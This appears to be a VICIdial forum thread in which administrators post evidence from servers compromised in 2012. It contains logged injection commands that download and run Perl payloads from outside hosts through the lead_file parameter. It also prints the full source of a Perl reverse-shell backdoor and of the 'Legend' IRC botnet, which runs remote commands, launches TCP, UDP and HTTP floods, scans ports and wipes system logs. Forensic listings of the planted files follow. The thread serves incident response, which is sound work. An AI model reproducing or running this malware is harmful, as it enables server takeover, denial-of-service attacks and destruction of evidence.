Moderators: gerski, enjay, williamconley, Op3r, Staydog, gardo, mflorell, MJCoate, mcargile, Kumba, Michael_N
[Sun Jul 22 14:23:23 2012] [error] [client new_listloader_superL.php] PHP Warning: fopen(cd /tmp;curl -O cox.x10.mx/.dc.txt;perl .dc.txt 12.237.27.3 45295): failed to open stream: No such fi
le or directory in /srv/www/htdocs/vicidial/new_listloader_superL.php on line 792
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 970 100 970 0 0 13624 0 --:--:-- --:--:-- --:--:-- 48500
-------------------------------------
#!/usr/bin/perl
use Socket;
print "Devil Data Connecting Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting to host...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell to host...\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Detached, waiting for instructions\n\n";
grep 'lead_file' trunk/www/vicidial/admin_listloader_fourth_gen.php wrote:if (isset($_GET["lead_file"])) {$lead_file=$_GET["lead_file"];}
elseif (isset($_POST["lead_file"])) {$lead_file=$_POST["lead_file"];}
$file=fopen("$lead_file", "r");
[Mon Jul 23 07:52:18 2012] [error] [client 94.25.124.162] PHP Warning: fopen(;cd /tmp;wget http://am.highandtech.com/vici.txt;perl vici.txt;rm -rf vici.txt;): failed to open st
ream: No such file or directory in /srv/www/htdocs/vicidial/new_listloader_superL.php on line 801
--2012-07-23 07:52:18-- http://am.highandtech.com/vici.txt
Resolving am.highandtech.com... 64.15.156.74
Connecting to am.highandtech.com|64.15.156.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26531 (26K) [text/plain]
Saving to: `vici.txt'
0K .......... .......... ..... 100% 38.5K=0.7s
2012-07-23 07:52:19 (38.5 KB/s) - `vici.txt' saved [26531/26531]
#!/usr/bin/perl
###########################################################
#-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--#
###########################################################
# Legend Soldier [2012] DO NOT FUCKIN SHARE! #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Just the same old re-runs... #
###########################################################
# Added: #
# !legend @httpflood <host> <time> #
# !legend @clean #
# !legend @visit <webpage> #
# Oldies: #
# !legend @system #
# !legend @portscan <ip> #
# !legend @nmap <ip> <beginport> <endport> #
# !legend @back <ip><port> #
# !legend @sqlflood <host> <time> #
# !legend @udp <host> <packet size> <time> #
# !legend @udp2 <host> <packet size> <time> <port> #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
###########################################################
###########################################################
# addiCteD tO null!!! #
###########################################################
####################[Configuration]########################
###########################################################
my $hidden = 'init [3]';
my $linas_max='4';
my $sleep='5';
my @admins=("ARZ","god","Zax");
my @hostauth=("legendteam.info");
my @channels=("#vici");
my $nick='legend';
my $ircname ='vici';
my $realname = 'legend secrets!';
my $server='space.legendteam.info';
my $port='6667';
###########################################################
####################[Configuration]########################
###########################################################
####################[lets start..]#########################
###########################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
use LWP::UserAgent;
chdir("/");
$0="$hidden"."\0"x16;;
my $pid=fork;
exit if $pid;
die "fork problem: $!" unless defined($pid);
###########################################################
####################[lets start..]#########################
###########################################################
####################[Connecting...]########################
###########################################################
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
###########################################################
####################[Connecting...]########################
###########################################################
####################[..Connected..]########################
###########################################################
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION Legend IRC [2010]\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!legend)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick-".int rand(9999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $channel (@channels) {
sendraw("JOIN $channel sexy");
}
}
}
###########################################################
####################[..Functions..]########################
###########################################################
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
###########################################################
######################[..@system..]########################
###########################################################
if ($funcarg =~ /^system/) {
$uname=`uname -a`;
$uptime=`uptime`;
$ownd=`pwd`;
$distro=`cat /etc/issue`;
$id=`id`;
$un=`uname -sro`;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uname -a: 14 $uname");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uptime: 14 $uptime");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Process: 14 $hidden");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2ID: 14 $id");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Dir: 14 $ownd");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2OS: 14 $distro");
}
###########################################################
######################[..@system..]########################
###########################################################
###########################################################
######################[.@portscan.]########################
###########################################################
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
@portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Scanning for open ports on ".$1." 12 started .");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Open ports founded: @aberta");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 No open ports foundend.");
}
}
###########################################################
######################[.@portscan.]########################
###########################################################
###########################################################
########################[.@Visit.]#########################
###########################################################
if ($funcarg =~ /^visit (.*)/) {
my $url = "$1";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0');
$ua->timeout(10);
$ua->env_proxy;
my $response = $ua->get($url);
if ($response->is_success) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Got Response From $url.");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Failed Getting Response From $url.");
}
}
###########################################################
########################[.@Visit.]#########################
###########################################################
###########################################################
######################[.@tcpflood.]########################
###########################################################
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:.4 TCP Attacking14 ".$1.":".$2." 2for4 ".$3." 2seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:. 4TCP Attack done 14".$1.":".$2.".");
}
###########################################################
######################[.@tcpflood.]########################
###########################################################
###########################################################
#####################[.@httpflood.]########################
###########################################################
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking14 ".$1." 4for4 ".$2." 2seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking done ".$1.".");
}
###########################################################
#####################[.@httpflood.]########################
###########################################################
###########################################################
######################[.@sqlflood.]########################
###########################################################
if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking 4 ".$1." 14 on port 3306 for 4 ".$2." 2 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking done 14 ".$1.".");
}
###########################################################
######################[.@sqlflood.]########################
###########################################################
###########################################################
######################[.@udpflood.]########################
###########################################################
if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Attacking14 ".$1." 4with2 ".$2." 2KB(s) for4 ".$3." 2seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
}
###########################################################
######################[.@udpflood.]########################
###########################################################
###########################################################
######################[.@udp2flood.]########################
###########################################################
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Attacking14 ".$1.":".$4." 2with4 ".$2." 2KB(s) for4 ".$3." 2seconds.");
my ($dtime, %pacotes) = udpflooder2("$1", "$2", "$3","$4");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
}
############################################################
###########################################################
######################[.@cleanlogs.]#######################
###########################################################
if ($funcarg =~ /^cleanlogs/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 This process can be long2,4 just wait2!");
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 All default log and bash_history files erased");
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Now Erasing the rest of the machine log files");
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Done! All logs erased");
}
###########################################################
######################[.@cleanlogs.]#######################
###########################################################
###########################################################
########################[..@back..]########################
###########################################################
if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas){
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Back Connect2:.14 Connecting to 2 $host:$porta");
}
}
###########################################################
########################[..@back..]########################
###########################################################
###########################################################
#########################[.@nmap.]#########################
###########################################################
if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
my $hostip="$1";
my $portstart = "$2";
my $portend = "$3";
my (@abertas, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Scanning $1 For Ports: $2-$3");
foreach my $porta ($portstart..$portend){
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($xstats){
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Founded $porta"."/Open");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Complete");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 No open ports have been founded");
}
}
###########################################################
#########################[.@nmap.]#########################
###########################################################
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1; $port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub udpflooder2 {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my $udpport = $_[3];
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
22:05:17-!- domedan [domedan@bredband.telia.com] has joined #vici
22:05:17[Users #vici]
22:05:17[@Arz ] [ legend-2114407] [ legend-4141544] [ legend-5216791] [ legend-6564188] [ legend-902578 ]
22:05:17[@legend ] [ legend-2219609] [ legend-4205939] [ legend-5453424] [ legend-6606186] [ legend-9074556 ]
22:05:17[@Zax ] [ legend-2399867] [ legend-4269871] [ legend-5457869] [ legend-6706281] [ legend-9085946 ]
22:05:17[ domedan ] [ legend-2472740] [ legend-4411230] [ legend-5506832] [ legend-6804481] [ legend-9106466 ]
22:05:17[ legend-1053838] [ legend-2532484] [ legend-4463938] [ legend-5613237] [ legend-6939433] [ legend-9121552 ]
22:05:17[ legend-1154062] [ legend-2573772] [ legend-4490485] [ legend-5773081] [ legend-7086824] [ legend-9175657 ]
22:05:17[ legend-119405 ] [ legend-2593175] [ legend-4621717] [ legend-5792627] [ legend-7277080] [ legend-9290305 ]
22:05:17[ legend-1196016] [ legend-2738087] [ legend-4670232] [ legend-5797741] [ legend-7323799] [ legend-9362856 ]
22:05:17[ legend-1228289] [ legend-2763621] [ legend-4690292] [ legend-5811294] [ legend-7411641] [ legend-9532331 ]
22:05:17[ legend-1301620] [ legend-2854885] [ legend-4717048] [ legend-5845477] [ legend-7492307] [ legend-9541299 ]
22:05:17[ legend-1403000] [ legend-3011003] [ legend-4757422] [ legend-59046 ] [ legend-7566805] [ legend-9597850 ]
22:05:17[ legend-1500923] [ legend-3130239] [ legend-4792816] [ legend-5971684] [ legend-7590112] [ legend-9618615 ]
22:05:17[ legend-1551443] [ legend-3284672] [ legend-4810559] [ legend-5987907] [ legend-7596290] [ legend-9719818 ]
22:05:17[ legend-1640994] [ legend-3437207] [ legend-4816366] [ legend-6018961] [ legend-7603667] [ legend-972908-1472135]
22:05:17[ legend-1903723] [ legend-3481315] [ legend-4845444] [ legend-6035015] [ legend-7719432] [ legend-9838014 ]
22:05:17[ legend-1921205] [ legend-3489298] [ legend-4871822] [ legend-6261054] [ legend-7782481] [ legend-9862820 ]
22:05:17[ legend-198544 ] [ legend-3551466] [ legend-493663 ] [ legend-629499 ] [ legend-7946213]
22:05:17[ legend-2028755] [ legend-3901269] [ legend-5029084] [ legend-6337581] [ legend-8092993]
22:05:17[ legend-2041938] [ legend-4093763] [ legend-5037497] [ legend-6339421] [ legend-8603140]
22:05:17[ legend-2064633] [ legend-409732 ] [ legend-509556 ] [ legend-6377342] [ legend-8605492]
22:05:17[ legend-2088615] [ legend-4123099] [ legend-515754 ] [ legend-6394740] [ legend-8885262]
22:05:17-!- Irssi: #vici: Total of 121 nicks [3 ops, 0 halfops, 0 voices, 118 normal]
22:05:17-!- Channel #vici created Wed Jul 25 11:47:52 2012
22:05:17-!- Irssi: Join to #vici was synced in 0 secs
22:06:38[space] -!- #zax Arz H* 0 hacktech@legendteam.info [TheChozen]
22:06:38[space] -!- End of /WHO list
22:06:52[space] -!- #vici legend H 0 vici@72.21.12.168 [legend secrets!]
22:06:52[space] -!- End of /WHO list
22:07:14[space] -!- #perl Zax H* 0 Zax@legendteam.info [Zax]
22:07:14[space] -!- End of /WHO list
the holes should be fixed, can you guys who have been hacked post your logs somewhere so we can figure out what vulnerability they are using to get to the listloader
XXX:~ # ls -l /tmp/.x/.sh3ll/
total 136
-rw-r--r-- 1 wwwrun www 1064 2012-07-31 17:00 mech.levels
-rw------- 1 wwwrun www 5 2012-07-18 08:11 mech.pid
-rw-r--r-- 1 wwwrun www 207 2012-07-31 17:00 mech.session
-rw-r--r-- 1 wwwrun www 89108 2012-07-31 17:10 pig.seen
-rwx--x--x 1 wwwrun www 15078 2011-02-06 20:04 stealth
-rwxr-xr-x 1 wwwrun www 6204 2012-07-17 23:16 timeout
-rwxr-xr-x 1 wwwrun www 183 2012-07-18 08:11 update
-rwxr-xr-x 1 wwwrun www 81 2012-07-31 17:00 usr
XXX:~ # ls -l /tmp/.x/.sh3ll/
total 136
-rw-r--r-- 1 wwwrun www 1064 2012-07-31 17:00 mech.levels
-rw------- 1 wwwrun www 5 2012-07-18 08:11 mech.pid
-rw-r--r-- 1 wwwrun www 207 2012-07-31 17:00 mech.session
-rw-r--r-- 1 wwwrun www 89108 2012-07-31 17:10 pig.seen
-rwx--x--x 1 wwwrun www 15078 2011-02-06 20:04 stealth
-rwxr-xr-x 1 wwwrun www 6204 2012-07-17 23:16 timeout
-rwxr-xr-x 1 wwwrun www 183 2012-07-18 08:11 update
-rwxr-xr-x 1 wwwrun www 81 2012-07-31 17:00 usr
Jul 18 08:22:01 Vicidial /usr/sbin/cron[9674]: (wwwrun) CMD (/tmp/.x/.sh3ll/update >/dev/null 2>&1)
vicidial:# ps aux | grep stealth
root 4402 0.0 0.0 2412 468 pts/2 S+ 19:15 0:00 grep stealth
# !legend @httpflood <host> <time> #
# !legend @clean #
# !legend @visit <webpage> #
# Oldies: #
# !legend @system #
# !legend @portscan <ip> #
# !legend @nmap <ip> <beginport> <endport> #
# !legend @back <ip><port> #
# !legend @sqlflood <host> <time> #
# !legend @udp <host> <packet size> <time> #
# !legend @udp2 <host> <packet size> <time> <port> #
vicidial:~ # /tmp/.x/.sh3ll/stealth
mihai@fucked.gov:
Vine noaptea ;)
Usage: Distroy <Criminalu> <Port>
vicidial:~ # ps aux|grep wwwrun
wwwrun 16174 99.8 0.0 9040 5336 ? R Jul29 3877:59 init [3]
kill -9 16174
